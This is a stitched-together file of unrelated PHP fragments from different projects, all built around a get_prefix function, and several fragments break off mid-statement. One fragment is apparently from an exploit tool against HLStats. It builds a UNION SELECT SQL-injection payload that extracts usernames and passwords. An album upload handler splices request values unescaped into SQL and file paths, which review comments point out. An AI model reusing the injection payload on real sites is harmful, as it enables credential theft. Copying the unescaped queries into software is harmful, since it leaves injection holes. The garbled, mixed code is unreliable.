// Album admin actions, dispatched on the `act` request parameter.
// NOTE(review): every branch below reads $_REQUEST values and splices them
// straight into a filesystem path or an SQL string without validation or
// escaping (only ajax_save's album_id goes through intval()). Treat each
// $_REQUEST read here as untrusted input that still needs a cast/whitelist
// or a parameterised query.
require dirname(__FILE__) . '/includes/init.php';
if ($_REQUEST['act'] == 'list') {
    $album_types = get_album_types();
    $smarty->assign("album_types", $album_types);
    $smarty->display('album_list.htm');
    exit;
} elseif ($_REQUEST['act'] == 'ajax_list') {
    $list = album_list();
    make_json($list);
} elseif ($_REQUEST['act'] == 'upload') {
    // Directory the upload is stored in.
    // NOTE(review): atype_id is used as a path segment as-is; cast it to int
    // (or check it against the known album types) before building the path.
    $targetPath = '../resource/data/album/' . $_REQUEST['atype_id'];
    // NOTE(review): the token is md5 of a constant salt plus a timestamp the
    // client itself supplies, so it carries no per-request secret and is not a
    // substitute for a session-bound CSRF token or an authentication check.
    // `==` on two strings compares numerically when both look numeric; compare
    // with hash_equals() instead.
    $verifyToken = md5('unique_salt' . $_REQUEST['timestamp']);
    if (!empty($_FILES) && $_REQUEST['token'] == $verifyToken) {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        // Stored name = unique_name() + whatever get_prefix() derives from the
        // client-supplied file name; presumably that is the extension — verify,
        // and restrict it to an image whitelist before saving.
        $image_name = unique_name($targetPath . '/') . '.' . get_prefix($_FILES['Filedata']['name']);
        $targetFile = rtrim($targetPath, '/') . '/' . $image_name;
        // Return value is not checked: a failed move still gets a DB row and a
        // success response below.
        move_uploaded_file($tempFile, $targetFile);
        // NOTE(review): atype_id, Filename and the path derived from them are
        // concatenated into the INSERT unescaped; escape via the driver or bind them.
        $sql = "insert into " . $ecs->table("album") . " (class_code, type, name, path, filesize, creator, created) \r\n\t\tvalues ('" . $_SESSION['class_code'] . "','" . $_REQUEST['atype_id'] . "', '" . $_REQUEST['Filename'] . "',\r\n\t\t\t'" . $targetFile . "','" . $_FILES['Filedata']['size'] . "','" . $_SESSION['admin_id'] . "',now()) ";
        $db->query($sql);
        admin_log(addslashes($_REQUEST['Filename']), 'upload', "album_picture");
        make_json_result("上传“" . $_REQUEST['Filename'] . "”成功!");
    }
    // Reached when the token check or the upload fails — and after a success
    // too, unless make_json_result() terminates the script (not visible here).
    make_json_error("上传" . $_REQUEST['Filename'] . "失败!");
} elseif ($_REQUEST['act'] == 'ajax_save') {
    $id = !empty($_REQUEST['album_id']) ? intval($_REQUEST['album_id']) : 0;
    // NOTE(review): name and sort are concatenated into the UPDATE unescaped;
    // only album_id is cast. Bind or escape them the same way.
    $sql = "update " . $ecs->table("album") . " set name='" . $_REQUEST["name"] . "',\r\n\t\t\tsort='" . $_REQUEST["sort"] . "'\r\n\t\t\twhere album_id=" . $id;
    $db->query($sql);
    // The raw SQL text, request values included, is written to the admin log.
    admin_log(addslashes($_REQUEST["name"] . $id), 'update', $sql);
    make_json_result("修改成功!");
// The ajax_delete branch continues beyond this excerpt.
} elseif ($_REQUEST['act'] == 'ajax_delete') {
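/**
 * Build the tree-indent prefix for a shop category and record it in $prefixed.
 *
 * Walks up the parent chain recursively; each level appends one tree image to
 * $prefixed[$CategoryID]['s'] and to the returned string. The recursive call's
 * return value is discarded — only its side effects on $prefixed are used.
 *
 * @param int|string $CategoryID Category id; normalised to int before use.
 * @return string One '<img ...> ' per ancestor level, '' for a root category.
 */
function get_prefix($CategoryID)
{
    global $tpl, $template, $config, $mysql, $lang, $twig, $prefixed;

    // The id is spliced into SQL text, so force it to an integer first:
    // anything non-numeric would otherwise reach the query verbatim.
    $CategoryID = (int) $CategoryID;

    // Always initialised; the original appended to an undefined local.
    $add_prefix = '';

    $ParentID = (int) $mysql->result('SELECT parent_id FROM ' . prefix . '_eshop_categories WHERE id = ' . $CategoryID . ' ');
    $prefixed[$CategoryID]['f'] .= ' ';

    if ($ParentID != 0) {
        $prefixed[$CategoryID]['s'] .= '<img src="/engine/plugins/eshop/tpl/img/tree.gif"> ';
        $add_prefix .= '<img src="/engine/plugins/eshop/tpl/img/tree.gif"> ';

        // Look the parent row up; $parentRowId stays null when it does not exist,
        // which previously led to a recursive call with an undefined id.
        $parentRowId = null;
        foreach ($mysql->select("SELECT * FROM " . prefix . "_eshop_categories WHERE id=" . $ParentID . " ") as $row2) {
            $parentRowId = $row2['id'];
        }
        if ($parentRowId !== null) {
            get_prefix($parentRowId);
        }
    }

    return $add_prefix;
}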
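/**
 * Move attachment blobs held in the database out to the DISK upload store.
 *
 * Runs from the admin upgrade page and prints an HTML progress table as it
 * goes: one row per attachment, then a summary line.
 *
 * @param string $p_source 'attachment' (bug files) or 'project' (project files)
 * @return void Everything is echoed; nothing is returned.
 */
function upgrade_move_att2disk( $p_source ) {
	# pick the table and the row label from the source type
	if( $p_source == 'attachment' ) {
		$t_file_table = db_get_table( 'bug_file' );
		$t_bug_label = "Bug";
	}
	if( $p_source == 'project' ) {
		$t_file_table = db_get_table( 'project_file' );
		$t_bug_label = "Project";
	}

	# check that the source was valid
	if( !isset( $t_file_table ) ) {
		echo 'Failure: Internal Error: File source not set';
		return;
	}

	# check that the destination is set up properly
	$t_upload_method = config_get_global( 'file_upload_method' );
	if( $t_upload_method <> DISK ) {
		echo 'Failure: Upload Method is not DISK';
		return;
	}

	# only rows that still carry their content in the database need moving
	$query = 'SELECT * FROM ' . $t_file_table . ' WHERE content <> \'\'';
	$result = @db_query_bound( $query );
	if( false == $result ) {
		echo '<p>No attachments need to be moved.</p>';
		return;
	}

	$count = db_num_rows( $result );
	echo '<p>Found ' . $count . ' attachments to be moved.</p>';

	$t_failures = 0;
	if( $count > 0 ) {
		echo '<table width="80%" bgcolor="#222222" cellpadding="10" cellspacing="1">';
		# Headings
		echo '<tr bgcolor="#ffffff"><th width="10%">' . $t_bug_label . '</th><th width="20%">Attachment</th><th width="70%">Status</th></tr>';
	}

	for( $i = 0;$i < $count;$i++ ) {
		$t_row = db_fetch_array( $result );

		// trace bug id back to project to determine the proper file path
		if( $p_source == 'attachment' ) {
			$t_project_id = bug_get_field( $t_row['bug_id'], 'project_id' );
			$t_bug_id = $t_row['bug_id'];
		} else {
			$t_project_id = (int) $t_row['project_id'];
			$t_bug_id = $t_project_id;
		}

		$t_file_path = project_get_field( $t_project_id, 'file_path' );
		$prefix = get_prefix( $t_file_path );
		$t_real_file_path = $prefix . $t_file_path;
		# file_clean_name() is the only thing standing between the stored name and
		# the path written below — presumably it strips separators; confirm.
		$c_filename = file_clean_name( $t_row['filename'] );

		// the stored filename was chosen by whoever uploaded it and is rendered
		// into HTML here, so escape it (and the paths built from it)
		printf( "\n<tr %s><td>%8d</td><td>%s</td><td>", helper_alternate_class(), $t_bug_id, htmlspecialchars( $t_row['filename'], ENT_QUOTES, 'UTF-8' ) );

		if( is_blank( $t_real_file_path ) || !file_exists( $t_real_file_path ) || !is_dir( $t_real_file_path ) || !is_writable( $t_real_file_path ) ) {
			echo 'Destination ' . htmlspecialchars( $t_real_file_path, ENT_QUOTES, 'UTF-8' ) . ' not writable';
			$t_failures++;
		} else {
			// no separator is inserted: assumes $t_file_path already ends in one — confirm
			$t_file_name = $t_real_file_path . $c_filename;

			// write file to disk store after adjusting the path
			if( file_put_contents( $t_file_name, $t_row['content'] ) ) {
				// successful, update database
				/** @todo do we want to check the size of data transfer matches here? */
				$c_new_file_name = $t_file_path . $c_filename;
				$query2 = "UPDATE $t_file_table SET diskfile = " . db_param() . ", folder = " . db_param() . ", content = '' WHERE id = " . db_param();
				$update = @db_query_bound( $query2, Array( $c_new_file_name, $t_file_path, $t_row['id'] ) );
				if( !$update ) {
					echo 'database update failed';
					$t_failures++;
				} else {
					echo 'moved to ' . htmlspecialchars( $t_file_name, ENT_QUOTES, 'UTF-8' );
				}
			} else {
				echo 'copy to ' . htmlspecialchars( $t_file_name, ENT_QUOTES, 'UTF-8' ) . ' failed';
				$t_failures++;
			}
		}
		echo '</td></tr>';
	}

	echo '</table><br />' . $count . ' attachments processed, ' . $t_failures . ' failures';
}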
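/**
 * Escape text for embedding inside a single-quoted JavaScript string literal.
 *
 * Backslash and single quote get a backslash prefix; CR and LF become the
 * two-character escapes \r and \n so the literal stays on one line.
 *
 * @param string $text
 * @return string
 */
function _rdfquery_js_escape($text)
{
    return addcslashes($text, "\\'\r\n");
}

/**
 * Render a triples result set as comma-separated rdfQuery `$.rdf.triple(...)` calls.
 *
 * @param array $triples `$triples['result']` maps a subject URI to an array of
 *                       predicate URI => list of objects, each object an array
 *                       with 'type' ('literal' or a URI type) and 'value'.
 * @return string JavaScript source, one call per object, terminated by "\n".
 */
function triples_to_rdfquery($triples)
{
    $rdfquery = '';

    // Every call is attached to the FIRST subject in the result set; the
    // per-subject key is not used below (presumably callers pass a single
    // subject — verify before relying on multi-subject input).
    $uri = key($triples['result']);
    $emitted = 0;

    foreach ($triples['result'] as $predicates) {
        foreach ($predicates as $predicate => $objects) {
            $head = "\$.rdf.triple('<" . _rdfquery_js_escape($uri) . "> " . get_qname($predicate);
            $namespaces = "namespaces: { " . get_short_prefix($predicate) . ": '" . get_prefix($predicate) . "' }";

            foreach ($objects as $object) {
                // One separator per emitted call. The original attached the comma
                // to the predicate, so several objects under one predicate were
                // written back to back with no separator between the calls.
                if ($emitted > 0) {
                    $rdfquery .= ",\n";
                }
                $emitted++;

                if ($object['type'] == 'literal') {
                    // Escape \ and " for the Turtle literal first, then the whole
                    // term for the enclosing JS string (the original only handled ').
                    $turtle = str_replace(array('\\', '"'), array('\\\\', '\\"'), $object['value']);
                    $term = ' "' . _rdfquery_js_escape($turtle) . '"';
                } else {
                    $term = ' <' . _rdfquery_js_escape($object['value']) . '>';
                }

                $rdfquery .= $head . $term . " .',{\n{$namespaces}\n})";
            }
        }
    }

    $rdfquery .= "\n";
    return $rdfquery;
}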
$GLOBALS["VERBOSE"] = true; } if ($argv[1] == "--id") { parse_db($argv[2]); die; } if ($argv[1] == "--import-id") { import_users($argv[2]); die; } if ($argv[1] == "--make-unique") { make_database_unique($argv[2]); die; } if ($argv[1] == "--get-prefix") { get_prefix($argv[2]); die; } $unix = new unix(); $pidfile = "/etc/artica-postfix/" . basename(__FILE__) . ".pid"; $pid = trim(@file_get_contents($pidfile)); if ($unix->process_exists($pid)) { $pid = getmypid(); echo "[{$pid}]:: Process {$pid} already running...\n"; die; } function get_prefix($path) { if (!is_file("{$path}.pre")) { $handle = @fopen("{$path}", "r"); $d = 0;
} return $prefix; } if (isset($_REQUEST['target']) && $_REQUEST['target'] != '') { //this exploit can take its sweet time. set_time_limit(0); $http = new http(); $addr = explode('?', $_REQUEST['target']); $addr = $addr[0]; if (isset($_REQUEST['proxy'])) { $http->proxy($_REQUEST['proxy']); } switch ($_REQUEST['button']) { case 'HLStats_Logins': $table = false; $prefix = get_prefix($addr); //print_r($prefix); foreach ($prefix as $pre) { if (!$table) { print "trying table prefix:{$pre}<br>"; //no comments are used in this payload, instead a second union select is used to finnish the query. $pay = "killLimit=1000%20union%20select%20username,password,acclevel,1,playerId%20from%20" . $pre . "Users%20UNION%20SELECT%201,1,1,1,1%20FROM%20" . $pre . "Players%20WHERE%201=0"; $resp = $http->post($addr . "?mode=playerinfo&player=1", '', $pay); $table = hl_get_sql($resp); // } } if (!$table && @(!in_array('hlstats_', $prefix))) { //ooah no the exploit has failed so far. $pre = "hlstats_"; //try the default prefix
/**
 * Resolve the default class for an identifier, or false when none is found.
 *
 * Resolution order: a still-loadable cached answer; the package-specific
 * class, then the package's Default class; finally the candidate list
 * configured for the identifier, loaded through the koowa loader. The
 * outcome (class name or false) is cached for the next call.
 *
 * @param KServiceIdentifier $identifier The identifier of the class
 *
 * @return string|bool The class name, or false if not found
 */
public static function findDefaultClass($identifier)
{
    $key = (string) $identifier;

    // A cached entry is reused while it is still loadable; a cached false is a
    // remembered "not found" and is returned as-is.
    if (isset(self::$_defaults[$key])) {
        $cached = self::$_defaults[$key];
        if ($cached === false || class_exists($cached)) {
            return $cached;
        }
    }

    $base   = 'Lib' . ucfirst($identifier->package) . KInflector::implode($identifier->path);
    $loader = KService::get('koowa:loader');

    // First the specific class, then the package-level Default class.
    $found = false;
    foreach (array($base . ucfirst($identifier->name), $base . 'Default') as $candidate) {
        if (class_exists($candidate)) {
            $found = $candidate;
            break;
        }
    }

    // Fall back to the identifier's configured candidates, if any are registered.
    if ($found === false && isset(self::$_identifiers[$key])) {
        $config = self::$_identifiers[$key];

        if (isset($config['default'])) {
            $candidates = array_unique($config['default']);
        } else {
            $candidates = get_prefix($config['prefix'], $config['name']);
            if (isset($config['fallback'])) {
                $candidates[] = $config['fallback'];
            }
        }

        foreach ($candidates as $candidate) {
            // Locate the file first, then try to load it.
            if ($loader->findPath($candidate, $identifier->basepath)
                && $loader->loadClass($candidate, $identifier->basepath)) {
                $found = $candidate;
                break;
            }
        }
    }

    self::setDefaultClass($key, $found);

    return $found;
}
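/**
 * Detach this connection from a channel.
 *
 * Sends a GRIP `detach` control message that names the prefixed channel.
 *
 * @param string $channel Channel name without the configured prefix
 * @return void
 */
public function detach($channel)
{
    $args = array();
    $args['channel'] = get_prefix() . $channel;
    // The channel arguments must travel with the control message; the original
    // built $args and then never passed it, so no channel name was sent.
    $this->send_control(\GripControl\GripControl::websocket_control_message('detach', $args));
}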